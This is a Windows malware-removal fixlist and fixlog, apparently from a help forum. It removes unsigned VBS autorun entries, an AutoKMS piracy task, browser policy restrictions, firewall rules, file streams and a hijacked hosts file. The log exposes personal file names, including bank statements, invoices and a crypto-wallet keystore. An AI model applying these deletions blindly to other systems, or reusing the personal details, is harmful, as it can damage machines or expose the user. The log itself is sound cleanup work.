C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\ChromeSetup.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\cpg15x => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\desktop (New).ini => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\index.php => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\JDownloader => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4 => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\PA2018040002.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\plna_moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Plná moc.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\priloha1.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\readme.txt => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Spořitelna.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Telegram Desktop => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Ulozto => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\wordpress => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\__MACOSX => ":com.dropbox.attrs" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe" => removed successfully
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe => moved successfully
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\SunJavaUpdateSched" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Value" => removed successfully
"HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Microsoft Software Essentials" => removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
HKLM\SOFTWARE\Policies\Mozilla => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{114D61BE-723E-4720-9A0D-15FEB326AC4B}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD7FA012-E446-4088-B57D-E33EE8969426}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager" => not found
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DEA268E2-12DD-4984-AB28-F8F89AFCFFCA}" => removed successfully
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EEA50510-8C7D-45F8-BEF4-240855B8A812}" => removed successfully
C:\WINDOWS\System32\Tasks\AutoKMS => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS" => removed successfully
"C:\WINDOWS\AutoKMS" => not found
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
=========== EmptyTemp: ==========
BITS transfer queue => 10772480 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 221777092 B
Java, Flash, Steam htmlcache => 1080 B
Windows/system/drivers => 209262 B
Edge => 33792 B
Chrome => 166347126 B
Brave => 322395 B
Firefox => 10614505 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 34550 B
IRENA-PC => 7177522 B
RecycleBin => 0 B
EmptyTemp: => 398 MB temporary data Removed.
================================
The system needed a reboot.
==== End of Fixlog 20:16:47 ====
Ran by IRENA-PC (20-01-2021 20:16:06) Run:1
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Boot Mode: Normal
==============================================
fixlist content:
*****************
Start
CloseProcesses:
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => -> No File
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => -> No File
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => -> No File
AlternateDataStreams: C:\ProgramData\TEMP:0888F409 [284]
AlternateDataStreams: C:\ProgramData\TEMP:3440EB47 [143]
AlternateDataStreams: C:\ProgramData\TEMP:66633281 [159]
AlternateDataStreams: C:\ProgramData\TEMP:93433455 [820]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\102394978_1.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\ChromeSetup.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\cpg15x:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\desktop (New).ini:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\index.php:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\JDownloader:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Mall rádio2.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Malwarebytes Anti-Malware 3.6.1.2711.rar:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18 (1).jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\NewDoc 2018-03-18.jpg:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003 (1).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\OBJ2018040003.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\PA2018040002.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\payeer_mastercard_en.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc (1.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\plna_moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Plná moc.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\priloha1.PDF:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\readme.txt:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Recepty_pro_horkovzdušnou_fritézu_R-286__CZ__11.11.2016.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\reklamacni_list.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Reklamacny-formular-vasmobil.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Shhq5QS4WNM18Ap85GVYjpNctzp3LRFeZP.json:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 14. 7. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Sken 26. 6. 2018 (2).pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Spořitelna.png:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TeamViewerQS.exe:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Telegram Desktop:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TH_20180601-20180623.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\TRUSTED_TunePat_Netflix_Video_keygen:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Ulozto:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\UTC--2017-11-14T18-20-12.713Z--984d522fcd4684d49e0d08715da5c20cba86eceb:com.dropbox.attrs [52]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vypis z klientskeho uctu za obdobi 1802.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vypoved-pojistne-smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (1).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy (2).doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\vzory_ukonceni_smlouvy.doc:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Vzor_vypovedi_pojistne_smlouvy.docx:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\wordpress:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\Zadost 26. 6. 2018.pdf:com.dropbox.attrs [54]
AlternateDataStreams: C:\Users\IRENA-PC\Downloads\__MACOSX:com.dropbox.attrs [54]
FirewallRules: [UDP Query User{4CF5DFC9-9461-49D6-950C-BB62564F6244}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [TCP Query User{CD7B74D8-A37B-4004-84B4-A34E0A3D68ED}C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_261\bin\javaw.exe => No File
FirewallRules: [UDP Query User{BC12CC3D-9EB7-430F-A11E-D240044FD1A6}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [TCP Query User{E1BC68F1-347B-4940-8A33-5D907DBCDA84}C:\program files (x86)\youwave android\vb\vboxsdl.exe] => (Allow) C:\program files (x86)\youwave android\vb\vboxsdl.exe => No File
FirewallRules: [UDP Query User{29287B3F-2A2F-4C57-A399-98061B1E6F2B}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [TCP Query User{7E06897A-6AF1-466E-9D68-134E4975B2C8}C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_251\bin\javaw.exe => No File
FirewallRules: [UDP Query User{25003063-5796-4BA7-9F27-DF50B557D31D}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
FirewallRules: [TCP Query User{E8D4CD91-1165-4346-8883-1D96257E6F52}D:\filmy\seriály\telenovely\moonbot\moonbot.exe] => (Allow) D:\filmy\seriály\telenovely\moonbot\moonbot.exe => No File
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
C:\WINDOWS\AutoKMS
EmptyTemp:
Hosts:
End
*****************
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => subkey with invalid name -> removed successfully
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => subkey with invalid name -> removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Drive\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\AllFileSystemObjects\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\MEGA (Context menu) => removed successfully
C:\ProgramData\TEMP => ":0888F409" ADS removed successfully
C:\ProgramData\TEMP => ":3440EB47" ADS removed successfully
C:\ProgramData\TEMP => ":66633281" ADS removed successfully
C:\ProgramData\TEMP => ":93433455" ADS removed successfully
C:\Users\IRENA-PC\Downloads => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\0000003044029183_20171231_D_007_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\0000003044029183_20190831_K_008_000_M_C.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\102394978_1.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2018-03-12 12_24_15-Historie transakcí _ SERVIS 24.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\2568bee2-7540-4a15-b62b-abf4c8ec8122.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\61cd06ea-2cc3-448b-9ead-882a3b596714.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\avidemux_2.7.1_win32.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\ChromeSetup.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\cpg15x => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\creditNote_1900000049.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\desktop (New).ini => ":com.dropbox.attrs" ADS could not remove.
C:\Users\IRENA-PC\Downloads\DropboxInstaller.exe => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\e8318c29-e1d9-482a-b440-976b38e0cf1e.tmp => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce (1).PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura k dorucene dodavce.PDF => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura mining 2.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktura12. 9. 2018.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Faktuta mining 001.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\IMG_20180407_084256.jpg => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\index.php => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\invoice_180105480.pdf => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\JDownloader => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\jollycoin-node-1.0.tar.xz => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\kalendar_2018_str_2_p000000.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\Kalendář-2018-1.png => ":com.dropbox.attrs" ADS removed successfully
C:\Users\IRENA-PC\Downloads\KMS_2038 & Digital & Online Activation Suite v8.4 => ":com.dropbox.attrs" ADS removed successfully
